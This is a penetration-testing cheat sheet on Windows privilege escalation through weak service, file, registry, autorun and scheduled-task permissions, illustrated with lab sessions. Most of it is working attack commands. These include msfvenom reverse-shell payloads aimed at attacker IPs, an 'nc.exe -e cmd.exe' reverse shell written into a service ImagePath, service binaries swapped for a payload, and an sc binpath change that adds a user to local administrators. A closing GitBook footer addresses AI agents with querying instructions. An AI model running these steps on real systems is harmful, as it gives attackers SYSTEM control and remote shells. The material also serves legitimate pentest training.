> For the complete documentation index, see [llms.txt](https://0xss0rz.gitbook.io/0xss0rz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/weak-permissions.md).
# Weak Permissions
## Services Issues
```powershell
# PowerUp
Get-ServiceUnquoted -Verbose # Unquoted path
Get-ModifiableServiceFile -Verbose # Current user can write to the binary path or change args to the binary
Get-ModifiableService -Verbose # Current user can modify configuration
```
## Permissive File System ACLs
### **Running SharpUp**
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
```powershell-session
PS C:\htb> .\SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Service Binaries ===
Name : SecurityService
DisplayName : PC Security Management Service
Description : Responsible for managing PC security
State : Stopped
StartMode : Auto
PathName : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
```
### ACEshark
{% embed url="" %}
### **Checking Permissions with icacls**
```
icacls usage:
check permissions, set ownership of the folder, set, remove or deny permissions
# Check permissions
PS C:\> icacls C:\folder_name
(...)
I - permission inherited from the parent container
F - full access (full control)
M - Modify right/access
OI - object inherit
IO - inherit only
CI - container inherit
RX - read and execute
AD - append data (add subdirectories)
WD - write data and add files
# Set ownership
PS C:\> icacls C:\folder_name /setowner Username
```
```powershell-session
PS C:\htb> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\Program Files (x86)\PCProtect\SecurityService.exe BUILTIN\Users:(I)(F)
Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
```
`EVERYONE` and `BUILTIN\Users` groups have been granted full permissions to the directory
### **Replacing Service Binary**
```cmd-session
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\htb> sc start SecurityService
```
Make a backup of the original binary and replace it with a malicious binary generated with `msfvenom`. It can give us a reverse shell as `SYSTEM`, or add a local admin user and give us full administrative control over the machine.
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.76 LPORT=443 -f exe > SecurityService.exe
```
## Weak Service Permissions
```cmd-session
C:\htb> SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name : WindscribeService
DisplayName : WindscribeService
Description : Manages the firewall and controls the VPN tunnel
State : Running
StartMode : Auto
PathName : "C:\Program Files (x86)\Windscribe\WindscribeService.exe"
```
### **Checking Permissions with AccessChk**
```cmd-session
C:\htb> accesschk.exe /accepteula -quvcw WindscribeService
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
WindscribeService
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
```
All Authenticated Users have [SERVICE\_ALL\_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) rights over the service
### **Check Local Admin Group**
```cmd-session
C:\htb> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
mrb3n
The command completed successfully.
```
`htb-student` is not a member.
### **Changing the Service Binary Path**
```cmd-session
C:\htb> sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
[SC] ChangeServiceConfig SUCCESS
```
**Stopping and Starting Service**
```cmd-session
C:\htb> sc stop WindscribeService
```
```cmd-session
C:\htb> sc start WindscribeService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
```
The command we placed in the `binpath` will run even though an error message is returned. The service fails to start because the `binpath` is not pointing to the actual service executable
### **Confirming Local Admin Group Addition**
```cmd-session
C:\htb> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
htb-student
mrb3n
The command completed successfully.
```
### Cleanup
```cmd-session
C:\htb> sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
```
```cmd-session
C:\htb> sc start WindScribeService
```
```cmd-session
C:\htb> sc query WindScribeService
```
### Other example - Insecure Service Permissions
**Before starting exploitation**\
\- Create a reverse shell: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe`\
\- Transfer reverse.exe on the victim machine
**Exploitation**
1. Use [**AccessChk**](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) to check the user account's permissions on the service. Ex with username 'user' et service 'daclsvc': `C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc`
2. **Permission to change config files**: `SERVICE_CHANGE_CONFIG`
3. Query the service: `sc qc daclsvc`
4. If the service runs with **SYSTEM privileges** (`SERVICE_START_NAME`)
5. Modify the service config and **set the BINARY\_PATH\_NAME** (binpath) to the reverse.exe: `sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""`
6. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start daclsvc`
### Other example - Insecure Service Executables
1. Query the "filepermsvc" service and note that it **runs with SYSTEM privileges** (SERVICE\_START\_NAME).: `sc qc filepermsvc`
2. Using accesschk.exe, note that the **service binary (BINARY\_PATH\_NAME) file is writable by everyone**: `C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"`
3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and **replace** the filepermservice.exe with it: `copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start filepermsvc`
## Unquoted Service Path
### **Service Binary Path**
```shell-session
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
```
Windows will attempt to load the following potential executables in order on service start, with a .exe being implied:
* `C:\Program`
* `C:\Program Files`
* `C:\Program Files (x86)\System`
* `C:\Program Files (x86)\System Explorer\service\SystemExplorerService64`
If we can create the following files, we would be able to hijack the service binary and gain command execution in the context of the service, in this case, `NT AUTHORITY\SYSTEM`.
* `C:\Program.exe\`
* `C:\Program Files (x86)\System.exe`
However, creating files in the root of the drive or the program files folder requires administrative privileges.
### **Searching for Unquoted Service Paths**
```cmd-session
C:\htb> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
GVFS.Service GVFS.Service C:\Program Files\GVFS\GVFS.Service.exe Auto
System Explorer Service SystemExplorerHelpService C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe Auto
WindscribeService WindscribeService C:\Program Files (x86)\Windscribe\WindscribeService.exe Auto
```
### Example - IObitUnSvr
{% embed url="" %}
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > IObit.exe
```
No right to write on path
Get-ServiceAcl.ps1:
```
Import-Module "C:/Users/username/Desktop/Get-ServiceAcl.ps1"
"IObitUnSvr" | Get-ServiceAcl | select -ExpandProperty Access
```
Rights to change config
```
sc.exe config IObitUnSvr binPath="cmd.exe /c "C:\Users\username\Desktop\IObit.exe""
sc.exe stop IObitUnSvr
sc.exe start IObitUnSvr
```
### Other example - Unquoted Service Path
1. Query the "unquotedsvc" service and note that it runs with **SYSTEM privileges** (SERVICE\_START\_NAME) and that the **BINARY\_PATH\_NAME is unquoted and contains spaces**. `sc qc unquotedsvc` Ex: `BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
2. Using accesschk.exe, note that the BUILTIN\Users group is **allowed to write** to the C:\Program Files\Unquoted Path Service\ directory: `C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"`
3. **Copy** the reverse.exe (cf. Insecure Service Permissions - before starting exploitation) executable you created to this directory and **rename it Common.exe**: `copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start unquotedsvc`
## Permissive Registry ACLs
### **Checking for Weak Service ACLs in Registry**
```cmd-session
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Accesschk v6.13 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2020 Mark Russinovich
Sysinternals - www.sysinternals.com
RW HKLM\System\CurrentControlSet\services\ModelManagerService
KEY_ALL_ACCESS
```
### **Changing ImagePath with PowerShell**
```powershell-session
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
```
### Other example - Weak Registry Permissions
1. Query the "regsvc" service and note that it **runs with SYSTEM privileges** (SERVICE\_START\_NAME) : `sc qc regsvc`
2. Using accesschk.exe, note that the registry entry for the regsvc service is **writable by the "NT AUTHORITY\INTERACTIVE" group** (essentially all logged-on users): `C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc`
3. **Overwrite the ImagePath registry key** to point to the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation)
: `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f`
4. Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges: `net start regsvc`
## Modifiable Registry Autorun Binary
### **Check Startup Programs**
```powershell-session
PS C:\htb> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
Name : OneDrive
command : "C:\Users\mrb3n\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : WINLPE-WS01\mrb3n
Name : Windscribe
command : "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart
Location : HKU\S-1-5-21-2374636737-2633833024-1808968233-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : WINLPE-WS01\mrb3n
Name : SecurityHealth
command : %windir%\system32\SecurityHealthSystray.exe
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : Public
Name : VMware User Process
command : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : Public
Name : VMware VM3DService Process
command : "C:\WINDOWS\system32\vm3dservice.exe" -u
Location : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : Public
```
Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.
### Other example - Registry - AutoRuns
1. Query the registry for AutoRun executables: `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
2. Using accesschk.exe, note that **one of the AutoRun executables is writable by everyone**: `C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"`
3. Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and **overwrite the AutoRun executable** with it: `copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y`
4. Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves! `rdesktop MACHINE_IP`
## Scheduled Task
View the contents of the C:\DevTools\CleanUp.ps1 script: `type C:\DevTools\CleanUp.ps1`
The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file: `C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1`
Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created: `echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1`
Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.
## Startup Apps
Writable ? `C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"`
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/weak-permissions.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.